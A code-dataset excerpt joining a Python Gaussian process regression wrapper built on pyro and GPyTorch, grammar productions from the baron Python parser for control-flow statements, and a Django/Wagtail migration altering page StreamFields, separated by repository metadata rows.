dloss = losses[-1]-losses[-2] if len(losses)>2 else self.tol*1000
if 0<=dloss and dloss<self.tol: n_wait += 1
else: n_wait = 0
if n_wait>=max_wait: break
if self.validation is not None: return model, optimizer, losses, train_err, valid_err
return model, optimizer, losses
def fit(self, train_x, train_y, n_Xu=None):
if n_Xu is not None: self.n_Xu = n_Xu
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x)
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y)
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = train_x.shape[1]
self.kernel = gp.kernels.Matern32(input_dim, variance=None, lengthscale=None, active_dims=None)
if self.model is not None: self.continue_run = True
tstart = time()
if train_y.ndim==1:
if self.validation is not None:
past_info = {'model':self.model, 'losses':self.losses, 'optimizer':self.optimizer, 'train_err': self.train_err, 'valid_err':self.valid_err} if self.continue_run else None
model, optimizer, losses, train_err, valid_err = self.fit_1out(train_x, train_y, past_info=past_info)
self.model, self.optimizer, self.losses, self.train_err, self.valid_err = model, optimizer, losses, train_err, valid_err
                tend = time()
                print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
else:
past_info = {'model':self.model, 'losses':self.losses, 'optimizer':self.optimizer} if self.continue_run else None
model, optimizer, losses = self.fit_1out(train_x, train_y, past_info=past_info)
self.model, self.optimizer, self.losses = model, optimizer, losses
tend = time()
print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
else:
if self.validation is not None:
if self.model is None:
self.model, self.optimizer, self.losses, self.train_err, self.valid_err = {}, {}, {}, {}, {}
for i in range(train_y.shape[1]):
print('Regressing output variable {}'.format(i+1))
past_info = {'model':self.model[i], 'losses':self.losses[i], 'optimizer':self.optimizer[i], 'train_err': self.train_err[i], 'valid_err':self.valid_err[i]} if self.continue_run else None
model, optimizer, losses, train_err, valid_err = self.fit_1out(train_x, train_y[:,i], past_info=past_info)
self.model[i], self.optimizer[i], self.losses[i], self.train_err[i], self.valid_err[i] = model, optimizer, losses, train_err, valid_err
tend = time()
print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
else:
if self.model is None:
self.model, self.optimizer, self.losses = {}, {}, {}
for i in range(train_y.shape[1]):
print('Regressing output variable {}'.format(i+1))
past_info = {'model':self.model[i], 'losses':self.losses[i], 'optimizer':self.optimizer[i]} if self.continue_run else None
model, optimizer, losses = self.fit_1out(train_x, train_y[:,i], past_info=past_info)
self.model[i], self.optimizer[i], self.losses[i] = model, optimizer, losses
tend = time()
print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
def predict_1out(self, X_test, return_std=True, return_cov=False):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
y_mean, y_cov = self.model(X_test, full_cov=True, noiseless=False)
if return_std:
y_std = y_cov.diag().sqrt()
return y_mean.detach().numpy(), y_std.detach().numpy()
if return_cov: return y_mean.detach().numpy(), y_cov.detach().numpy()
return y_mean.detach().numpy()
def predict(self, X_test, return_std=True, return_cov=False):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
if type(self.model) is dict:
y_mean, y_cov = [], []
for i in range(len(self.model)):
y_mean0, y_cov0 = self.model[i](X_test, full_cov=True, noiseless=False)
y_mean.append(y_mean0.detach().numpy())
y_cov.append(y_cov0.detach().numpy())
if return_std:
y_std = [np.sqrt(np.diag(y_cov1)) for y_cov1 in y_cov]
return np.array(y_mean).T, np.array(y_std).T
if return_cov: return np.array(y_mean).T, np.array(y_cov).T
return np.array(y_mean).T
def score(self, X_test, y_test):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
if type(y_test)==torch.Tensor: y_test = y_test.detach().numpy()
y_pred = self.predict(X_test, return_std=False, return_cov=False)
scr = r2_score(y_test, y_pred)
return scr
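# A minimal usage sketch for SparseGPR_pyro, assuming pyro and torch are
# installed. With a 2-D target it fits one sparse GP per output column and
# can resume training on a second fit() call; the arrays are illustrative:
#
#     X = np.random.rand(200, 3)
#     Y = np.column_stack([np.sin(X[:, 0]), np.cos(X[:, 1])])
#     sgp = SparseGPR_pyro(max_iter=500, n_Xu=20, validation=0.1)
#     sgp.fit(X, Y)
#     mean, std = sgp.predict(X, return_std=True)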
class GPR_GPyTorch:
def __init__(self, max_iter=1000, tol=0.01, kernel=None, loss_fn=None, verbose=True, learning_rate=1e-3, optimizer=None, validation=0.1):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
self.optimizer = optimizer
# self.validation = validation
self.train_loss = []
self.valid_loss = []
def prepare_model(self, train_x, train_y, kernel=None):
multi_task = False
if train_y.ndim>1:
if train_y.shape[1]>1:
multi_task = True
if multi_task:
print('Model for Multivariate output.')
# We will use the GP model for multivariate output, exact inference
class MultitaskGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(MultitaskGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.MultitaskMean(
gpytorch.means.ConstantMean(), num_tasks=train_y.shape[1]
)
self.covar_module = gpytorch.kernels.MultitaskKernel(
kernel, num_tasks=train_y.shape[1], rank=1
)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultitaskMultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.MultitaskGaussianLikelihood(num_tasks=train_y.shape[1])
self.model = MultitaskGPModel(train_x, train_y, self.likelihood)
else:
# We will use the simplest form of GP model, exact inference
class ExactGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(ExactGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.ConstantMean()
self.covar_module = gpytorch.kernels.ScaleKernel(kernel)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.GaussianLikelihood()
self.model = ExactGPModel(train_x, train_y, self.likelihood)
def fit(self, train_x, train_y):
# if self.validation is not None:
# if type(train_x)!=np.ndarray: train_x = train_x.detach().numpy()
# if type(train_y)!=np.ndarray: train_y = train_y.detach().numpy()
# train_x, valid_x, train_y, valid_y = train_test_split(train_x, train_y, test_size=self.validation, random_state=42)
# valid_x = torch.from_numpy(valid_x)
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x.astype(np.float32))
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y.astype(np.float32))
        if self.verbose: print(train_x.shape, train_y.shape)
# Check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
self.kernel = gpytorch.kernels.MaternKernel(nu=1.5)
# create simple GP model
if len(self.train_loss)==0:
self.prepare_model(train_x, train_y, kernel=self.kernel)
# Find optimal model hyperparameters
self.model.train()
self.likelihood.train()
if self.optimizer is None:
print('Using the adam optimizer.')
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
# "Loss" for GPs - the marginal log likelihood
if self.loss_fn in [None, 'marginal_log_likelihood', 'mll']:
mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.likelihood, self.model)
else:
mll = self.loss_fn
# optimize
for i in range(len(self.train_loss),self.max_iter):
# Zero gradients from previous iteration
self.optimizer.zero_grad()
# Output from model
output = self.model(train_x)
#print(type(output))
#print(output)
# Calc loss and backprop gradients
#print(output, train_y.shape)
loss = -mll(output, train_y)
loss.backward()
self.train_loss.append(loss.item())
# if self.validation:
# self.model.eval()
# self.likelihood.eval()
# valid_out = self.likelihood(self.model(valid_x))
# valid_ls = -mll(valid_out, valid_y)
# self.valid_loss.append(valid_ls.item())
# print('Iter %d/%d - Train Loss: %.3f Valid Loss: %.3f ' % (
# i + 1, self.max_iter, self.train_loss[-1], self.valid_loss[-1]
# ))
# self.model.train()
# self.likelihood.train()
# else:
            if self.verbose:
                print('Iter %d/%d - Loss: %.3f ' % (
                    i + 1, self.max_iter, self.train_loss[-1]
                ))
self.optimizer.step()
def predict(self, X_test, return_ci=True):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test.astype(np.float32))
# Get into evaluation (predictive posterior) mode
model, likelihood = self.model, self.likelihood
model.eval()
likelihood.eval()
# Test points are regularly spaced along [0,1]
# Make predictions by feeding model through likelihood
with torch.no_grad(), gpytorch.settings.fast_pred_var():
observed_pred = likelihood(model(X_test))
if return_ci:
lower, upper = observed_pred.confidence_region()
return observed_pred.mean.numpy(), lower.detach().numpy(), upper.detach().numpy()
        return observed_pred.mean.numpy()  # a distribution has no .detach(); return its mean
def score(self, X_test, y_test):
        if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test.astype(np.float32))  # keep dtype consistent with fit()
if type(y_test)==torch.Tensor: y_test = y_test.detach().numpy()
y_pred = self.predict(X_test, return_ci=False)
scr = r2_score(y_test, y_pred)
return scr
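
# Usage note (illustrative): fit() accepts numpy arrays (converted to float32
# tensors), resumes from the recorded train_loss on repeated calls, and
# predict(return_ci=True) returns (mean, lower, upper) as numpy arrays.
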
class SVGP_GPyTorch:
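    # NOTE: despite the name, this wrapper currently mirrors the exact-GP
    # class above (gpytorch.models.ExactGP + ExactMarginalLogLikelihood);
    # no variational / inducing-point (SVGP) machinery is implemented.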
def __init__(self, max_iter=1000, tol=0.01, kernel=None, loss_fn=None, verbose=True, learning_rate=1e-3, optimizer=None, validation=0.1):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
self.optimizer = optimizer
# self.validation = validation
self.train_loss = []
self.valid_loss = []
def prepare_model(self, train_x, train_y, kernel=None):
multi_task = False
if train_y.ndim>1:
if train_y.shape[1]>1:
multi_task = True
if multi_task:
print('Model for Multivariate output.')
# We will use the GP model for multivariate output, exact inference
class MultitaskGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(MultitaskGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.MultitaskMean(
gpytorch.means.ConstantMean(), num_tasks=train_y.shape[1]
)
self.covar_module = gpytorch.kernels.MultitaskKernel(
kernel, num_tasks=train_y.shape[1], rank=1
)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultitaskMultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.MultitaskGaussianLikelihood(num_tasks=train_y.shape[1])
self.model = MultitaskGPModel(train_x, train_y, self.likelihood)
else:
# We will use the simplest form of GP model, exact inference
class ExactGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(ExactGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.ConstantMean()
self.covar_module = gpytorch.kernels.ScaleKernel(kernel)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.GaussianLikelihood()
self.model = ExactGPModel(train_x, train_y, self.likelihood)
def fit(self, train_x, train_y):
# if self.validation is not None:
# if type(train_x)!=np.ndarray: train_x = train_x.detach().numpy()
# if type(train_y)!=np.ndarray: train_y = train_y.detach().numpy()
# train_x, valid_x, train_y, valid_y = train_test_split(train_x, train_y, test_size=self.validation, random_state=42)
# valid_x = torch.from_numpy(valid_x)
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x.astype(np.float32))
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y.astype(np.float32))
print(train_x.shape, train_y.shape)
# Check kernel
if self.kernel is None:
            print('No kernel given; defaulting to the Matern 3/2 kernel (nu=1.5).')
self.kernel = gpytorch.kernels.MaternKernel(nu=1.5)
# create simple GP model
if len(self.train_loss)==0:
self.prepare_model(train_x, train_y, kernel=self.kernel)
# Find optimal model hyperparameters
self.model.train()
self.likelihood.train()
if self.optimizer is None:
            print('No optimizer given; using the Adam optimizer.')
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
# "Loss" for GPs - the marginal log likelihood
if self.loss_fn in [None, 'marginal_log_likelihood', 'mll']:
mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.likelihood, self.model)
else:
mll = self.loss_fn
# optimize
for i in range(len(self.train_loss),self.max_iter):
# Zero gradients from previous iteration
self.optimizer.zero_grad()
# Output from model
output = self.model(train_x)
#print(type(output))
#print(output)
# Calc loss and backprop gradients
#print(output, train_y.shape)
loss = -mll(output, train_y)
loss.backward()
self.train_loss.append(loss.item())
# if self.validation:
# self.model.eval()
# self.likelihood.eval()
# valid_out = self.likelihood(self.model(valid_x))
# valid_ls = -mll(valid_out, valid_y)
# self.valid_loss.append(valid_ls.item())
# print('Iter %d/%d - Train Loss: %.3f Valid Loss: %.3f ' % (
# i + 1, self.max_iter, self.train_loss[-1], self.valid_loss[-1]
# ))
# self.model.train()
# self.likelihood.train()
# else:
print('Iter %d/%d - Loss: %.3f ' % (
i + 1, self.max_iter, self.train_loss[-1]
))
self.optimizer.step()
def predict(self, X_test, return_ci=True):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test.astype(np.float32))
# Get into evaluation (predictive posterior) mode
model, likelihood = self.model, self.likelihood
model.eval()
likelihood.eval()
        # Make predictions by passing the model output through the likelihood
with torch.no_grad(), gpytorch.settings.fast_pred_var():
observed_pred = likelihood(model(X_test))
if return_ci:
lower, upper = observed_pred.confidence_region()
            return observed_pred.mean.numpy(), lower.detach().numpy(), upper.detach().numpy()
        return observed_pred.mean.numpy()  # a distribution has no .detach(); return its mean
def score(self, X_test, y_test):
        if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test.astype(np.float32))  # keep dtype consistent with fit()
if type(y_test)==torch.Tensor: y_test = y_test.detach().numpy()
y_pred = self.predict(X_test, return_ci=False)
scr = r2_score(y_test, y_pred)
return scr
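
# Minimal usage sketch (illustrative only). It relies on the numpy/torch
# imports this module already uses and on synthetic data invented here:
if __name__ == '__main__':
    train_x = np.random.rand(100, 2).astype(np.float32)
    train_y = np.sin(train_x.sum(axis=1)).astype(np.float32)
    gp = SVGP_GPyTorch(max_iter=50, learning_rate=0.1)
    gp.fit(train_x, train_y)
    mean, lower, upper = gp.predict(train_x)  # posterior mean and CI bounds
    print('R^2 on training data:', gp.score(train_x, train_y))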
| 42.649418 | 221 | 0.611077 | 4,482 | 32,968 | 4.2722 | 0.066934 | 0.026948 | 0.014989 | 0.018801 | 0.890276 | 0.872937 | 0.859776 | 0.843639 | 0.830426 | 0.8216 | 0 | 0.011044 | 0.280393 | 32,968 | 772 | 222 | 42.704663 | 0.796071 | 0.117326 | 0 | 0.75419 | 0 | 0.001862 | 0.048956 | 0.002415 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083799 | false | 0 | 0.024209 | 0 | 0.184358 | 0.05959 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
98bfbea33a1ccdddc4cf6f13132c0b3d2af49a17 | 11,387 | py | Python | venv/Lib/site-packages/baron/grammator_control_structures.py | kofakira/migrate-ext | 1b3058a7cc123ab9648d89d1cb76723bea945fd9 | [
"BSD-4-Clause"
] | 2 | 2022-01-31T03:13:46.000Z | 2022-01-31T03:14:22.000Z | venv/Lib/site-packages/baron/grammator_control_structures.py | kofakira/migrate-ext | 1b3058a7cc123ab9648d89d1cb76723bea945fd9 | [
"BSD-4-Clause"
] | null | null | null | venv/Lib/site-packages/baron/grammator_control_structures.py | kofakira/migrate-ext | 1b3058a7cc123ab9648d89d1cb76723bea945fd9 | [
"BSD-4-Clause"
] | null | null | null | def include_control_structures(pg):
@pg.production("try_stmt : TRY COLON suite excepts")
def try_excepts_stmt(pack):
(try_, colon, suite, excepts) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": {},
"finally": {},
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite excepts else_stmt")
def try_excepts_else_stmt(pack):
(try_, colon, suite, excepts, else_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": else_stmt,
"finally": {},
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite excepts finally_stmt")
def try_excepts_finally_stmt(pack):
(try_, colon, suite, excepts, finally_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": {},
"finally": finally_stmt,
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite excepts else_stmt finally_stmt")
def try_excepts_else_finally_stmt(pack):
(try_, colon, suite, excepts, else_stmt, finally_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": else_stmt,
"finally": finally_stmt,
"excepts": excepts,
}]
@pg.production("try_stmt : TRY COLON suite finally_stmt")
def try_stmt(pack):
(try_, colon, suite, finally_stmt) = pack
return [{
"type": "try",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
"else": {},
"finally": finally_stmt,
"excepts": [],
}]
@pg.production("excepts : excepts except_stmt")
def excepts(pack):
(excepts_, except_stmt) = pack
return excepts_ + except_stmt
@pg.production("excepts : except_stmt")
def excepts_except_stmt(pack):
(except_stmt,) = pack
return except_stmt
@pg.production("except_stmt : EXCEPT test AS test COLON suite")
def except_as_stmt(pack):
(except_, test, as_, test2, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": as_.hidden_tokens_before,
"third_formatting": as_.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": "as",
"target": test2,
"exception": test,
"value": suite
}]
@pg.production("except_stmt : EXCEPT test COMMA test COLON suite")
def except_comma_stmt(pack):
(except_, test, comma, test2, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": comma.hidden_tokens_before,
"third_formatting": comma.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": ",",
"target": test2,
"exception": test,
"value": suite
}]
@pg.production("except_stmt : EXCEPT COLON suite")
def except_stmt_empty(pack):
(except_, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": [],
"third_formatting": [],
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": "",
"target": {},
"exception": {},
"value": suite
}]
@pg.production("except_stmt : EXCEPT test COLON suite")
def except_stmt(pack):
(except_, test, colon, suite) = pack
return [{
"type": "except",
"first_formatting": except_.hidden_tokens_after,
"second_formatting": [],
"third_formatting": [],
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
"delimiter": "",
"target": {},
"exception": test,
"value": suite
}]
@pg.production("finally_stmt : FINALLY COLON suite")
def finally_stmt(pack):
(finally_, colon, suite) = pack
return {
"type": "finally",
"value": suite,
"first_formatting": colon.hidden_tokens_before,
"second_formatting": colon.hidden_tokens_after,
}
@pg.production("else_stmt : ELSE COLON suite")
def else_stmt(pack):
(else_, colon, suite) = pack
return {
"type": "else",
"value": suite,
"first_formatting": else_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_after,
}
@pg.production("for_stmt : FOR exprlist IN testlist COLON suite")
def for_stmt(pack,):
(for_, exprlist, in_, testlist, colon, suite) = pack
return [{
"type": "for",
"value": suite,
"iterator": exprlist,
"target": testlist,
"else": {},
"first_formatting": for_.hidden_tokens_after,
"second_formatting": in_.hidden_tokens_before,
"third_formatting": in_.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
}]
@pg.production("for_stmt : FOR exprlist IN testlist COLON suite else_stmt")
def for_else_stmt(pack,):
(for_, exprlist, in_, testlist, colon, suite, else_stmt) = pack
return [{
"type": "for",
"value": suite,
"iterator": exprlist,
"target": testlist,
"else": else_stmt,
"first_formatting": for_.hidden_tokens_after,
"second_formatting": in_.hidden_tokens_before,
"third_formatting": in_.hidden_tokens_after,
"fourth_formatting": colon.hidden_tokens_before,
"fifth_formatting": colon.hidden_tokens_after,
}]
@pg.production("while_stmt : WHILE test COLON suite")
def while_stmt(pack):
(while_, test, colon, suite) = pack
return [{
"type": "while",
"value": suite,
"test": test,
"else": {},
"first_formatting": while_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}]
@pg.production("while_stmt : WHILE test COLON suite else_stmt")
def while_stmt_else(pack):
(while_, test, colon, suite, else_stmt) = pack
return [{
"type": "while",
"value": suite,
"test": test,
"else": else_stmt,
"first_formatting": while_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}]
@pg.production("if_stmt : IF test COLON suite")
def if_stmt(pack):
(if_, test, colon, suite) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}]
}]
@pg.production("if_stmt : IF test COLON suite elifs")
def if_elif_stmt(pack):
(if_, test, colon, suite, elifs) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}] + elifs
}]
@pg.production("elifs : elifs ELIF test COLON suite")
def elifs_elif(pack,):
(elifs, elif_, test, colon, suite) = pack
return elifs + [{
"type": "elif",
"first_formatting": elif_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
"value": suite,
"test": test,
}]
@pg.production("elifs : ELIF test COLON suite")
def elif_(pack,):
(elif_, test, colon, suite) = pack
return [{
"type": "elif",
"first_formatting": elif_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
"value": suite,
"test": test,
}]
@pg.production("if_stmt : IF test COLON suite else_stmt")
def if_else_stmt(pack):
(if_, test, colon, suite, else_stmt) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}, else_stmt]
}]
@pg.production("if_stmt : IF test COLON suite elifs else_stmt")
def if_elif_else_stmt(pack):
(if_, test, colon, suite, elifs, else_stmt) = pack
return [{
"type": "ifelseblock",
"value": [{
"type": "if",
"value": suite,
"test": test,
"first_formatting": if_.hidden_tokens_after,
"second_formatting": colon.hidden_tokens_before,
"third_formatting": colon.hidden_tokens_after,
}] + elifs + [else_stmt]
}]
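
# Illustrative only (not part of baron itself): the productions above build
# plain-dict FST nodes. With the full baron package installed, the
# 'ifelseblock' node produced by if_stmt() can be inspected via:
#
#     import baron
#     baron.parse('if a:\n    pass\n')[0]['type']   # -> 'ifelseblock'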
| 37.705298 | 79 | 0.523492 | 1,054 | 11,387 | 5.335863 | 0.043643 | 0.136558 | 0.153094 | 0.196835 | 0.907361 | 0.840505 | 0.791074 | 0.76867 | 0.706259 | 0.683855 | 0 | 0.000552 | 0.364099 | 11,387 | 301 | 80 | 37.830565 | 0.776136 | 0 | 0 | 0.681004 | 0 | 0 | 0.230263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086022 | false | 0 | 0 | 0 | 0.168459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c70b135deb200cb553f13c25c31231a3967d6230 | 17,081 | py | Python | cotr/cms/migrations/0011_auto_20200313_1258.py | kingsdigitallab/cotr | 4afbfdd36d4dd0ee9f56152d3c963453c81e440c | [
"MIT"
] | null | null | null | cotr/cms/migrations/0011_auto_20200313_1258.py | kingsdigitallab/cotr | 4afbfdd36d4dd0ee9f56152d3c963453c81e440c | [
"MIT"
] | 27 | 2020-12-28T17:34:59.000Z | 2022-03-12T00:25:43.000Z | cms/migrations/0011_auto_20200313_1258.py | kingsdigitallab/ctrs-django | 7170b4f15bd9d097d00f215d747a02a9b656768c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.9 on 2020-03-13 12:58
import cms.models.streamfield
from django.db import migrations
import wagtail.contrib.table_block.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('cms', '0010_auto_20191205_1519'),
]
operations = [
migrations.AlterField(
model_name='blogindexpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='blogpost',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
